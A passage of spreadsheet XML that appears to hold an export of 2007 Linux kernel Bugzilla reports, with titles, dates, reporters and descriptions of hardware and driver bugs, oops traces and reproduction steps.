  </si>
  <si>
    <t>IRQ's not delivered for bcm43xx on x86_64</t>
  </si>
  <si>
    <t>2.6.20-rc4-Linus-g25ed3b78-dirty</t>
  </si>
  <si>
    <t>2007-01-08 09:00 UTC</t>
  </si>
  <si>
    <t>2007-01-20 16:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Unknown - new hardware Distribution: openSUSE 10.2 Hardware Environment: HP dv2125nr notebook Turion 64 X2 Mobile Software Environment: Problem Description: Interrupts are not delivered to bcm43xx module. Steps to reproduce: N/A This may be the same as Bug #7761. The bcm43xx card seems to be initialized properly and a channel scan is initiated, but no interrupts are delivered to the registered routine. The output of 'cat /proc/interrupts' is: CPU0 CPU1 0: 5164 490958 IO-APIC-edge timer 1: 22 2281 IO-APIC-edge i8042 8: 0 0 IO-APIC-edge rtc 9: 207 34511 IO-APIC-fasteoi acpi 12: 2892 308065 IO-APIC-edge i8042 15: 215 17424 IO-APIC-edge ide1 18: 0 2 IO-APIC-fasteoi ohci1394 19: 0 0 IO-APIC-fasteoi sdhci:slot0, bcm43xx 20: 0 90 IO-APIC-fasteoi HDA Intel 22: 2154 198436 IO-APIC-fasteoi eth0 23: 640 55069 IO-APIC-fasteoi libata NMI: 154 239 LOC: 477286 477475 ERR: 0 I have tried (one at a time) the boot options of acpi=noirq. irqfixup, irqpoll, and pci=routeirq without success. Curiously, the card has worked on two occasions, but after a reboot, it once again fails. I will attach the output of dmesg and my .config.</t>
  </si>
  <si>
    <t>modprobe -r ohci1394 may block uninterruptibly</t>
  </si>
  <si>
    <t>2007-01-08 12:54 UTC</t>
  </si>
  <si>
    <t>2007-02-21 03:27 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: unknown Hardware Environment: UP PC with two FireWire cards, one card has an external FireWire node attached Steps to reproduce: for ((x=0; x&lt;20; x++));do modprobe ohci1394 &amp;&amp; sleep 2 &amp;&amp; modprobe -r ohci1394 || break; done modprobe -r will soon get stuck in D state, hanging on kthread_stop with hl_drivers_sem and kthread_stop_lock held. But different to bug 6706, knodemgrd sleeps *interruptibly* in nodemgr_host_thread. As soon as the external node is unplugged, modprobe gets going again. I.e. the bug can be recovered from with physical access to the machine. I cannot reproduce this _without_ an external node attached.</t>
  </si>
  <si>
    <t>don't enforce hotplugging of eth1394</t>
  </si>
  <si>
    <t>High NFS traffic Oops</t>
  </si>
  <si>
    <t>2007-01-09 04:48 UTC</t>
  </si>
  <si>
    <t>Horst H. von Brand</t>
  </si>
  <si>
    <t>2007-02-26 11:09 UTC</t>
  </si>
  <si>
    <t>7796 7798</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Don't know, I just found a report for 2.6.19.1 with the same symptoms, no older ones have shown up (but I didn't compile much stuff before this way, so...). There it generated a string of 8 or so Oopses (reported separately). Distribution: Aurora Corona Hardware Environment: SPARC Station Ultra 1 Software Environment: gcc-4.1.1-30.1, binutils-2.17.50.0.3-6.sparc, nfs-utils-1.0.9-8.al3 Problem Description: Trying to compile a package on an x86_64 (Fedora rawhide, fully up to date) which automounts my account from the SPARC produces an Oops (attached), and nfsd hangs. "service nfs status" reports that nfsd is dead, trying "service nfs start" complains that the port is in use. Steps to reproduce: Oops report: Jan 8 18:50:02 pincoya kernel: Unable to handle kernel NULL pointer dereference Jan 8 18:50:02 pincoya kernel: tsk-&gt;{mm,active_mm}-&gt;context = 0000000000000901 Jan 8 18:50:02 pincoya kernel: tsk-&gt;{mm,active_mm}-&gt;pgd = fffff800378ee000 Jan 8 18:50:02 pincoya kernel: \|/ ____ \|/ Jan 8 18:50:02 pincoya kernel: "@'/ .. \`@" Jan 8 18:50:02 pincoya kernel: /_| \__/ |_\ Jan 8 18:50:02 pincoya kernel: \__U_/ Jan 8 18:50:02 pincoya kernel: nfsd(2605): Oops [#8] Jan 8 18:50:02 pincoya kernel: TSTATE: 0000004480009604 TPC: 0000000000474304 TNPC: 0000000000474308 Y: 00000000 Not tainted Jan 8 18:50:02 pincoya kernel: TPC: &lt;put_page+0xc/0xf4&gt; Jan 8 18:50:02 pincoya kernel: g0: 0000000000000000 g1: 000000000000000c g2: 0000000000004000 g3: 000000000000f000 Jan 8 18:50:02 pincoya kernel: g4: fffff800344eb020 g5: 00000000006f7961 g6: fffff80034518000 g7: 000000000000000c Jan 8 18:50:02 pincoya kernel: o0: 0000000000000001 o1: 0000000000000001 o2: 000000000046c8ac o3: 0000000000000002 Jan 8 18:50:02 pincoya kernel: o4: 0000000000000001 o5: 000000000046c86c sp: fffff8003451ae51 ret_pc: 00000000005e3b08 Jan 8 18:50:02 pincoya kernel: RPC: &lt;_read_unlock_irq+0x28/0x48&gt; Jan 8 18:50:02 pincoya kernel: l0: fffff80003627c68 l1: 0000000000000000 l2: fffff800000002c0 l3: 00000000004f21d4 Jan 8 18:50:03 pincoya kernel: l4: 0000000000000150 l5: fffff80034516000 l6: 00000000101d4c98 l7: 0000000000000018 Jan 8 18:50:03 pincoya kernel: i0: 0000000000000000 i1: fffff800001f2618 i2: 000000000000002a i3: 0000000000000009 Jan 8 18:50:03 pincoya kernel: i4: fffff8003451b8a0 i5: fffff800366fea68 i6: fffff8003451af11 i7: 00000000101b0774 Jan 8 18:50:03 pincoya kernel: I7: &lt;nfsd_read_actor+0xbc/0xf8 [nfsd]&gt; Jan 8 18:50:03 pincoya kernel: Caller[00000000101b0774]: nfsd_read_actor+0xbc/0xf8 [nfsd] Jan 8 18:50:03 pincoya kernel: Caller[000000000046d230]: do_generic_mapping_read+0x15c/0x444 Jan 8 18:50:03 pincoya kernel: Caller[000000000046d554]: generic_file_sendfile+0x3c/0x50 Jan 8 18:50:03 pincoya kernel: Caller[00000000101ae674]: nfsd_vfs_read+0x29c/0x3cc [nfsd] Jan 8 18:50:03 pincoya kernel: Caller[00000000101aec38]: nfsd_read+0x9c/0xb0 [nfsd] Jan 8 18:50:03 pincoya kernel: Caller[00000000101b5f88]: nfsd3_proc_read+0xd8/0x114 [nfsd] Jan 8 18:50:03 pincoya kernel: Caller[00000000101aa2ec]: nfsd_dispatch+0xdc/0x1f0 [nfsd] Jan 8 18:50:03 pincoya kernel: Caller[00000000100e2e54]: svc_process+0x448/0x74c [sunrpc] Jan 8 18:50:03 pincoya kernel: Caller[00000000101aaa1c]: nfsd+0x19c/0x31c [nfsd] Jan 8 18:50:03 pincoya kernel: Caller[000000000041797c]: kernel_thread+0x38/0x48 Jan 8 18:50:03 pincoya kernel: Caller[00000000100e249c]: __svc_create_thread+0x144/0x178 [sunrpc] Jan 8 18:50:03 pincoya kernel: Instruction DUMP: 81cfe008 01000000 9de3bf40 &lt;c25e0000&gt; 05000010 90100018 82084002 02c84006 92062008</t>
  </si>
  <si>
    <t>Unable to read DVDs on external IEEE1394 DVD-RW</t>
  </si>
  <si>
    <t>2007-01-09 10:57 UTC</t>
  </si>
  <si>
    <t>Daniel Nolan-Neylan</t>
  </si>
  <si>
    <t>2007-01-10 23:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18 (to my best knowledge) Distribution: Archlinux Hardware Environment: 1 IDE disk, 1 IDE CD-RW (plextor), 1 IEEE1394 DVD-RW Software Environment: Using udev, 2.6.19.1 with modules sg, sbp2, sr_mod, ieee1394 Problem Description: My DVD drive is being detected as a CD-ROM drive and seems to only be able to play CDs. I can produce the error when I have the device plugged in via firewire and modprobe sbp2. This creates (using udev rules) sr0, sg0 and cdrom1 (cdrom0 is IDE CD-RW) nodes in /dev. Udev is not getting the message that it is a DVD. However, even if I manually link /dev/dvd (for the DVD players) to /dev/sr0, I get the following errors: Jan 9 19:01:27 neptune end_request: I/O error, dev sr0, sector 15557132 Jan 9 19:01:27 neptune end_request: I/O error, dev sr0, sector 15557128 This has started happening since I upgraded to 2.6.19. Jan 9 18:54:56 neptune ieee1394: sbp2: Logged out of SBP-2 device Jan 9 18:55:04 neptune ieee1394: sbp2: Driver forced to serialize I/O (serialize_io=1) Jan 9 18:55:04 neptune ieee1394: sbp2: Try serialize_io=0 for better performance Jan 9 18:55:04 neptune scsi8 : SBP-2 IEEE-1394 Jan 9 18:55:05 neptune ieee1394: sbp2: Logged into SBP-2 device Jan 9 18:55:07 neptune scsi 8:0:0:0: CD-ROM SONY DVD RW DRU-810A 2.0b PQ: 0 ANSI: 0 Jan 9 18:55:13 neptune sr0: scsi-1 drive Jan 9 18:55:13 neptune sr 8:0:0:0: Attached scsi generic sg0 type 5 Steps to reproduce: rmmod sbp2 modprobe sbp2</t>
  </si>
  <si>
    <t>files cannot be read off mounted DVDs, because they are considered to be beyond the end of the device</t>
  </si>
  <si>
    <t>2007-01-10 16:06 UTC</t>
  </si>
  <si>
    <t>Vasilis Vasaitis</t>
  </si>
  <si>
    <t>2009-03-18 09:09 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Debian unstable Hardware Environment: Asus M2N-E (nVidia nForce 570 Ultra) motherboard Plextor PX-712SA serial ATA DVD writer Software Environment: Problem Description: When I mount a DVD, sometimes I am unable to read some files from it, getting errors like the following: attempt to access beyond end of device sr0: rw=0, want=5373636, limit=2097151 Buffer I/O error on device sr0, logical block 1343408 It seems that the kernel gets the DVD size wrong, because if I try to take an image using dd, the result is a much smaller file compared to the contents of the DVD. On the other hand, if I use readom (the Debian cdrkit equivalent to cdrecord's readcd) to take the image, which seems to bypass the kernel and send commands directly to the drive, the result is of the correct size, and if I mount the image with loopback I can read all files just fine. Steps to reproduce:</t>
  </si>
  <si>
    <t>Slow boot if shutdown w/ psmouse loaded - HP Compaq nc6320</t>
  </si>
  <si>
    <t>Linux version 2.6.17 (Ubuntu 2.6.17-10.34-generic)</t>
  </si>
  <si>
    <t>2007-01-12 08:25 UTC</t>
  </si>
  <si>
    <t>Peter Clifton</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Unknown Distribution: Ubuntu Hardware Environment: HP Compaq nc6320 Software Environment: Any Problem Description: After a shutdown or reboot in linux with psmouse loaded, the system is very slow to boot, and when booted does not present the second SSDT table needed for CPU frequency scaling. Rebooting (Urgh...) Windows, executing "rmmod psmouse" before reboot or shutdown , or unplugging the battery for a minute or so, gives a nice quick bootup and proper CPU scaling on the next boot. Steps to reproduce: Shutdown linux with psmouse loaded, reboot. Probably unrelated, but when booting the laptop on Battery, the laptop often reports: BUG: soft lockup detected on CPU#0 Most reliable cure is plugging in the AC. I will file a separate bug if someone can suggest a category for it.</t>
  </si>
  <si>
    <t>add vendor/device id for Option GT Max 3.6 cards</t>
  </si>
  <si>
    <t>2007-01-12 15:47 UTC</t>
  </si>
  <si>
    <t>Garret D'Amore</t>
  </si>
  <si>
    <t>2007-02-26 14:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: none Distribution: ubuntu, LFS Hardware Environment: x86 laptop (Centrino M) Software Environment: Problem Description: Cingular has recently started selling the Option GT Max GSM/HSDPA card. This device acts like the other Option devices, except that it has a unique device id of 0x6701. Adding it to the appropriate table in drivers/usb/serial/option.c allows it to work. (I've tested it, and can submit diffs if so desired.) The card uses the Option vendor id (0x0af0) and a new device id of 6701. I recommed that the macro for the device id be called: #define OPTION_PRODUCT_GTMAX36 0x6701 Steps to reproduce:</t>
  </si>
  <si>
    <t>Roland Kletzing</t>
  </si>
  <si>
    <t>commit edfe21a29b1dca9ce5a938317868066d2e21c385 breaks IPv6 address autoconfiguration</t>
  </si>
  <si>
    <t>2007-01-13 05:37 UTC</t>
  </si>
  <si>
    <t>Michael Gernoth</t>
  </si>
  <si>
    <t>2007-04-27 18:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19.1 Distribution: Debian Testing Hardware Environment: About 100 different x86 boxes Software Environment: no special software involved, just the kernel. No modules are loaded on the affected machines (everything needed is built into the kernel) Problem Description: After booting kernel 2.6.19.2 on our machines they no longer do IPv6 address autoconfiguration, although router advertisments can be seen on that interface: 14:19:14.254410 fe80::212:1eff:fe08:e040 &gt; ip6-allnodes: icmp6: router advertisement(chlim=64, pref=medium, router_ltime=1800, reachable_time=0, retrans_time=0)(src lladdr: 00:12:1e:08:e0:40) [ndp opt] (len 56, hlim 255) ip -6 addr output is: 1: eth0: &lt;BROADCAST,MULTICAST,UP,10000&gt; mtu 1500 qlen 1000 inet6 fe80::209:3dff:fe10:ccda/64 scope link valid_lft forever preferred_lft forever 2: eth1: &lt;BROADCAST,MULTICAST,UP,10000&gt; mtu 1500 qlen 1000 inet6 fe80::209:3dff:fe10:ccdb/64 scope link valid_lft forever preferred_lft forever 3: lo: &lt;LOOPBACK,UP,10000&gt; mtu 16436 inet6 ::1/128 scope host valid_lft forever preferred_lft forever (eth0 sees the advertisments) Manually setting the address and default-route works. Reverting commit edfe21a29b1dca9ce5a938317868066d2e21c385 fixes this problem. Steps to reproduce: 1. Upgrade to 2.6.19.2 2. Configure an interface for IPv4 3. The linklocal IPv6 address for the interface appears in ip -6 addr 4. Wait for a router advertisment 5. No Global IPv6 address and no IPv6 default route is set</t>
  </si>
  <si>
    <t>no keyboard activity after successful boot</t>
  </si>
  <si>
    <t>2.6.20rc5</t>
  </si>
  <si>
    <t>2007-01-13 14:25 UTC</t>
  </si>
  <si>
    <t>sebastienBRICE</t>
  </si>
  <si>
    <t>2007-11-15 13:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur:2.6.18.1 Distribution:debian unstable Hardware Environment:laptop fujitsu siemens A7620 Software Environment: GNU bash, version 3.1.17(1)-release (i486-pc-linux-gnu) Problem Description: hitting key product no effect Steps to reproduce: compiling a release candidate 2.6.20 precursor kernel</t>
  </si>
  <si>
    <t>dvb-core</t>
  </si>
  <si>
    <t>Kernel doesn't boot on Abit KN9S nForce 550 board and Athlon 64 X2 3800+ unless noapic is specified</t>
  </si>
  <si>
    <t>2007-01-14 03:44 UTC</t>
  </si>
  <si>
    <t>Alex Smith</t>
  </si>
  <si>
    <t>2007-06-06 11:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: N/A Distribution: Frugalware Linux (reproduced with Gentoo's gentoo-sources too) Hardware Environment: Athlon 64 X2 3800+ (Socket AM2), Abit KN9S nForce 550 motherboard (latest BIOS revision), ASUS nVidia GeForce 7300GS PCI-E graphics Software Environment: Kernel 2.6.19.2, bootloader is GNU GRUB 0.97. Problem Description: Using the hardware mentioned above, the kernel does not boot unless noapic is specified on the kernel command line, instead it displays a kernel panic which is shown in the photo which I'm about to attach Steps to reproduce: Boot a vanilla kernel 2.6.19.2. Boot with vga=normal otherwise the panic is not visible (I've reproduced with 2.6.18.x as well and previous versions in the .19.x series.)</t>
  </si>
  <si>
    <t>2.6.20-rc6</t>
  </si>
  <si>
    <t>2007-01-15 10:11 UTC</t>
  </si>
  <si>
    <t>François Valenduc</t>
  </si>
  <si>
    <t>2007-05-10 08:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19.2 (or maybe 2.6.20 until rc3, I haven't tested 2.6.20 before rc4) Distribution: Debian sid Hardware Environment: ACER Travelmate 4001 WMli, processor Intel centrino 1,5 GhZ (pentium M family) Software Environment: I don't think it's relevant Problem Description: When I wan't to shutdown the computer, the shutdown sequence occurs as expected, however, when the computer is supposed to power down, it reboots. Steps to reproduce: Try to powerdown the computer. Please don't hesitate to ask more info if needed.</t>
  </si>
  <si>
    <t>Kernel patch for S-Video/Composite-Input of the Terratec Cinergy 1400 DVB-T</t>
  </si>
  <si>
    <t>2007-01-15 13:25 UTC</t>
  </si>
  <si>
    <t>Heiko Baums</t>
  </si>
  <si>
    <t>2007-01-23 05:00 UTC</t>
  </si>
  <si>
    <t>Michael Krufky</t>
  </si>
  <si>
    <t>Please, apply the attached patch to the kernel. The file /usr/src/linux-2.6.19.2/drivers/media/video/cx88/cx88-cards.c needs to be patched to get the combined S-Video/Composite input of the Terratec Cinergy 1400 DVB-T working. The patch I've made is for kernel version 2.6.19.2. Btw, ".vmux = 2" is in both cases correct because this DVB-T card has only one input which is a combined S-Video/Composite input. How the input source has to be interpreted has to be set by the parameters/options of the capturing software like tvtime or mplayer. The picture quality for me is not the best but I don't know if and I don't think that this is kernel related. But maybe someone can have a look at this, too, if this can be tuned in the kernel. I don't know the functions of the gpio values in some of the other card descriptions in this file. So I don't know if it's necessary to set such a gpio value and to which value it has to be set to. But I'm getting a picture without it.</t>
  </si>
  <si>
    <t>if i use iproute2 for network balancing</t>
  </si>
  <si>
    <t>2007-01-16 03:06 UTC</t>
  </si>
  <si>
    <t>Delicostea Daniel Valentin</t>
  </si>
  <si>
    <t>2007-07-08 23:09 UTC</t>
  </si>
  <si>
    <t>Fedora Core4 Intel P4 2,4 /sbin/ip route change default equalize nexthop dev ppp0 nexthop dev ppp1 /sbin/ip route flush cache  Jan 16 13:00:21 server kernel: Oops: 0000 [#1] Jan 16 13:00:21 server kernel: SMP Jan 16 13:00:21 server kernel: CPU: 1 Jan 16 13:00:21 server kernel: EIP: 0060:[&lt;c02cabb7&gt;] Not tainted VLI Jan 16 13:00:21 server kernel: EFLAGS: 00010202 (2.6.19.1 #2) Jan 16 13:00:21 server kernel: EIP is at __ip_route_output_key+0x4a7/0xc99 Jan 16 13:00:21 server kernel: eax: 0000002c ebx: c0c46080 ecx: 00000001 e dx: 00fe7d01 Jan 16 13:00:21 server kernel: esi: 00000000 edi: da6a3800 ebp: dd24fd68 e sp: dd24fc58 Jan 16 13:00:21 server kernel: ds: 007b es: 007b ss: 0068 Jan 16 13:00:21 server kernel: Process cupsd (pid: 3581, ti=dd24e000 task=de8be5 70 task.ti=dd24e000) Jan 16 13:00:21 server kernel: Stack: da4ce800 00000001 c03deb10 0000000a dd24fd b0 00000068 00000000 00000000 Jan 16 13:00:21 server kernel: c0c46080 02000246 da4c0e80 c011f400 da4ce800 0000 0000 da9e5980 da6a3800 Jan 16 13:00:21 server kernel: 90000000 c045e140 da3f2c80 da3f2c80 da3f2c80 0000 0040 c02d2e19 00000001 Jan 16 13:00:21 server kernel: Call Trace: Jan 16 13:00:21 server kernel: [&lt;c011f400&gt;] __local_bh_enable+0x94/0xb3 Jan 16 13:00:21 server kernel: [&lt;c02d2e19&gt;] ip_mc_output+0x2f3/0x31e Jan 16 13:00:21 server kernel: [&lt;c02cb3bc&gt;] ip_route_output_flow+0x13/0x57 Jan 16 13:00:21 server kernel: [&lt;c02ea3e4&gt;] udp_sendmsg+0x2bb/0x537 Jan 16 13:00:21 server kernel: [&lt;c02af221&gt;] skb_copy_datagram_iovec+0x53/0x1dc Jan 16 13:00:21 server kernel: [&lt;c02efb74&gt;] inet_sendmsg+0x3b/0x45 Jan 16 13:00:21 server kernel: [&lt;c02a8c75&gt;] sock_sendmsg+0xd3/0xee Jan 16 13:00:21 server kernel: [&lt;c012b606&gt;] autoremove_wake_function+0x0/0x35 Jan 16 13:00:21 server kernel: [&lt;c0167ec2&gt;] core_sys_select+0x1b0/0x2a7 Jan 16 13:00:21 server kernel: [&lt;c02a9539&gt;] sys_sendto+0x116/0x140 Jan 16 13:00:21 server kernel: [&lt;c02a9bcd&gt;] sys_getsockname+0x86/0xb0 Jan 16 13:00:21 server kernel: [&lt;c02acae1&gt;] skb_dequeue+0x39/0x3f Jan 16 13:00:21 server kernel: [&lt;c02ad903&gt;] skb_queue_purge+0x11/0x17 Jan 16 13:00:21 server kernel: [&lt;c02c61c9&gt;] netlink_sock_destruct+0xe/0xe2 Jan 16 13:00:21 server kernel: [&lt;c02aae38&gt;] sk_free+0xbe/0xf3 Jan 16 13:00:21 server kernel: [&lt;e08b2cc3&gt;] rtl8139_interrupt+0x383/0x3c3 [8139t oo] Message from syslogd@server at Tue Jan 16 13:00:21 2007 ... server kernel: [&lt;c0103cf5&gt;] sysenter_past_esp+0x56/0x79 Message from syslogd@server at Tue Jan 16 13:00:21 2007 ... server kernel: ======================= Message from syslogd@server at Tue Jan 16 13:00:21 2007 ... server kernel: Code: 24 20 00 00 00 00 c7 44 24 60 00 00 00 00 e9 19 04 00 00 0f b6 c2 8a 4c 24 60 6b c0 2c 03 84 24 b0 00 00 00 88 8c 24 a5 00 00 00 &lt;8b&gt; 40 68 89 44 24 3c f0 ff 80 80 02 00 00 84 d2 74 3e 8b 44 24 Message from syslogd@server at Tue Jan 16 13:00:21 2007 ... server kernel: EIP: [&lt;c02cabb7&gt;] __ip_route_output_key+0x4a7/0xc99 SS:ESP 0068:d d24fc58</t>
  </si>
  <si>
    <t>Status? RAID-6 chunk_aligned_read</t>
  </si>
  <si>
    <t>2.6.20-rc1 - rc5</t>
  </si>
  <si>
    <t>2007-01-16 10:18 UTC</t>
  </si>
  <si>
    <t>2007-01-27 04:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19 Distribution: Gentoo (mainline kernel directly from kernel.org) Hardware Environment: AMD64, Tyan s2885, dual Opteron 242, 8 gig memory, 4 SATA drives Software Environment: md-RAID-1, -6 (partitioned), -0, all across all four SATA drives. root (and a backup root snapshot) on RAID-6 partitions. LVM2 on third RAID-6 partition. reiserfs for everything. Problem Description: I'm having the chunk_aligned_read issue, continuing on -rc5. I googled chunk_aligned_read and see the pre-rc1 commits, but nothing since. I searched bugs and nothing on it showed up, tho I'm not especially skilled at bugzilla queries. From google's results I see you were aware of the issue pre-rc1, and submitted patches for it. I'm still seeing the errors at boot, loading root off the RAID-6, tho based on the changelog entries that's the first try and the second, thru the stripe cache, goes thru. Still, it's -rc5, and I'm still seeing the issue, so whatever was done to fix that bad RAID-6 assumption (I read changelog entries but not C code so well tho I can sometimes get the gist, so it's "whatever" from my perspective) apparently didn't fix it for me. I gather from the changelogs and kernel list postings that pre-changes in 2.6.19-git18, the kernel /always/ read thru the stripe cache, so falling back to that now isn't a big deal. However, those warnings still look rather alarming, "harmless" or not, and I can't help but be worried if I'm putting system stability on the line. Bottom line, what's the status? Will proper RAID-6 assumptions be merged, curing the issue? Will the direct read changes be rolled back? Since it's now using as a fallback what it did before, will the warnings just be quited, at least for 2.6.20, with a real fix presumably for 2.6.21? A different solution? Did you think it was all fixed and this is new data? This RAID-6 users needs to know. His data depends on it! =8^) Hopefully this bug will avoid other inquiries as others find it. Thanks for all you kernel hackers do for us users. =8^) Duncan</t>
  </si>
  <si>
    <t>Missing important feature: libata bus shutdown and device shutdown</t>
  </si>
  <si>
    <t>2.6.x mainline</t>
  </si>
  <si>
    <t>2007-01-16 17:27 UTC</t>
  </si>
  <si>
    <t>2008-10-06 10:46 UTC</t>
  </si>
  <si>
    <t>Problem Description: The Linux kernel does not handle device_shutdown() for the libata buses. The bus has no .shutdown method. The devices have no .shutdown handlers. Therefore, device caches are not flushed prior to a system restart, system sleep or system powerdown, and device heads are not unloaded before a system sleep or powerdown, be it a transition to ACPI S3, S4 or S5 state, APM sleep/poweroff, or non-PM-poweroff (the one that just asks the user to powerdown the machine). This causes: * Potential data loss if userspace does not manage to flush caches using the passthrough * The need for the userspace halt(8) utility to try to avoid the above mentioned data loss (incidently, the lack of a proper high-level kernel interface to do device cache flushes or device head unloads also means the userspace code to do it is disgusting) * Uneeded device wear (disk head assembly) if userspace or ACPI BIOS firmware does not unload heads prior to power off. The disk's "head auto-park" on power off is actually called "emergency head unload" on modern disk drives by the HD manufacturers for a reason, and wears down the drive mechanics a lot more, causing the drive's lifetime to be drastically reduced. Hitachi documentation for laptop HDs mention an emergency unload as being from 20 to 100 times more stressfull to the drive mechanics, and makes it clear it should be avoided. Note that it is important to avoid unloading disk heads without a reason (especially on non-laptop drives), so the shutdown handler must differentiate a system restart (which should just sync caches) from a system power off (which needs to sync caches and also to unload heads). The fact that userspace will likely try to unload heads if it can before a shutdown means that either the kernel needs to snoop the few ATA commands that cause head unloads and spin-downs, to avoid reissuing such commands needlessly, or it needs to be easy for userspace to detect that the running kernel is one that can handle disk device shutdowns by itself. Otherwise, during a system shutdown sequence, the HDs are likely to be spun down (due to userspace command), only to be spun up and down again when the kernel attempts to shutdown the device. Also note that it is basically impossible for userspace to cover up for the lack of disk device shutdown handling by the kernel for ACPI S4 (suspend-to-disk), and that userspace code may fail to do it even for the normal shutdown if it doesn't find the devices, or doesn't know how to do it or that it should do it (e.g. Debian Sarge cannot properly shutdown libata devices). Steps to reproduce: * Patch halt(8) or the shutdown scripts to not attempt to issue commands to park heands and sync caches, and listen closely to the ammount of noise the HD will make when the system powers down. Note: this could conceivably kill the HD, and even if it doesn't, it will most surely reduce its working lifetime as much as pulling the plug with the machine running would. * Try to suspend-to-disk using ACPI S4 a ThinkPad T43 (other models might also have the same issue, but I have personally verified that a T43 BIOS does not unload disc heads for ACPI S4).</t>
  </si>
  <si>
    <t>boot hang unless "nmi_watchdog=0" - 2.6.19 regression - Asus M2400N (Centrino)</t>
  </si>
  <si>
    <t>2007-01-17 04:37 UTC</t>
  </si>
  <si>
    <t>Andrej Podzimek</t>
  </si>
  <si>
    <t>2008-01-21 21:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.x Distribution: Arch Linux + Vanilla kernel Hardware Environment: Asus M2400N, Centrino, Pentium M Software Environment: ArchLinux distro kernel, Vanilla kernel, Vanilla + Suspend2 Problem Description: My machine doesn't boot. The last kernel message I see is Setting up standard PCI resources Kernels I tried: Kernel 2.6.18.x: works fine. (Vanilla, Vanilla + Suspend2 and ArchLinux default) Kernel 2.6.19.x: always fails. (Vanilla, Vanilla + Suspend2, ArchLinux default, ArchLinux default + Suspend2) Kernel command line: devfs=nomount acpi=on acpi_irq_balance acpi_irq_isa=3,7,12 After removing the irq stuff, the problem persists. (IRQ 7 is needed to use LPT in ECP mode. The other two IRQs are reserved for my IRDA port.) I found a recommendation to disable ACPI. But that's what I shouldn't do on a laptop... How could I diagnose this more precisely? According to this thread http://bbs.archlinux.org/viewtopic.php?t=28794, Asus M3N is also affected. Steps to reproduce: Compile a 2.6.19.x kernel with gcc 4.1.2 on Asus M2400N, install it and reboot...</t>
  </si>
  <si>
    <t>ext3 with data=journal hangs when running fsx-linux</t>
  </si>
  <si>
    <t>2.6.20-rc2 thru -rc5</t>
  </si>
  <si>
    <t>2007-01-17 09:48 UTC</t>
  </si>
  <si>
    <t>2007-01-27 04:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20-rc1 Distribution: openSUSE 10.2 Hardware Environment: x86_64 AMD64 single-CPU, 1 GB RAM Software Environment: SMP kernel Problem Description: ext3 data=journal hangs, other journal modes run OK. Steps to reproduce: mkfs.ext3, mount with -o data=journal, run fsx-linux config: http://oss.oracle.com/~rdunlap/kerneltest/configs/config-2620-rc4-hangs msg log: http://oss.oracle.com/~rdunlap/kerneltest/logs/fsx-capture.txt</t>
  </si>
  <si>
    <t>fsx-linux kjournald BUG using ocfs2</t>
  </si>
  <si>
    <t>2.6.20-rc5</t>
  </si>
  <si>
    <t>2007-01-17 19:25 UTC</t>
  </si>
  <si>
    <t>2008-03-30 10:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: openSUSE 10.2 Hardware Environment: x86_64 AMD64 1-CPU, 1 GB RAM Software Environment: SMP kernel Problem Description: kernel BUG at fs/buffer.c:2648! Steps to reproduce: mkfs.ocfs2 -M local, mount.ocfs2, and run fsx-linux. Full script available upon request.</t>
  </si>
  <si>
    <t>UML tuntap driver cuts VLAN frames.</t>
  </si>
  <si>
    <t>2007-01-19 15:57 UTC</t>
  </si>
  <si>
    <t>2009-06-29 12:19 UTC</t>
  </si>
  <si>
    <t>Bug originally reported here: http://marc.theaimsgroup.com/?l=user-mode-linux-user&amp;m=116430742111716&amp;w=2 VLAN frames are longer, but UML ethernet drivers do not support this (i.e. they were not written with this in mind, if it worked it would be purely by accident). I've found at least a bug. Quoting from my own answer: this code in tuntap_read (arch/um/os-Linux/drivers/tuntap_kern.c) does (if you are using TUNTAP, as you seem to be doing): static int tuntap_read(int fd, struct sk_buff **skb, struct uml_net_private *lp) { *skb = ether_adjust_skb(*skb, ETH_HEADER_OTHER); if(*skb == NULL) return(-ENOMEM); return(net_read(fd, (*skb)-&gt;mac.raw, (*skb)-&gt;dev-&gt;mtu + ETH_HEADER_OTHER)); } The last line is a read for MTU + 14 bytes, and is surely buggy for a VLAN setup. If you are a C programmer and can add + 4 to that size (obtaining &lt;....&gt; + ETH_HEADER_OTHER + 4), can you test whether with this change the described problem disappears?</t>
  </si>
  <si>
    <t>(net b44) WOL problem</t>
  </si>
  <si>
    <t>2007-01-21 04:25 UTC</t>
  </si>
  <si>
    <t>bubulak</t>
  </si>
  <si>
    <t>2012-05-14 17:04 UTC</t>
  </si>
  <si>
    <t>drivers_network@kernel-bugs.osdl.org</t>
  </si>
  <si>
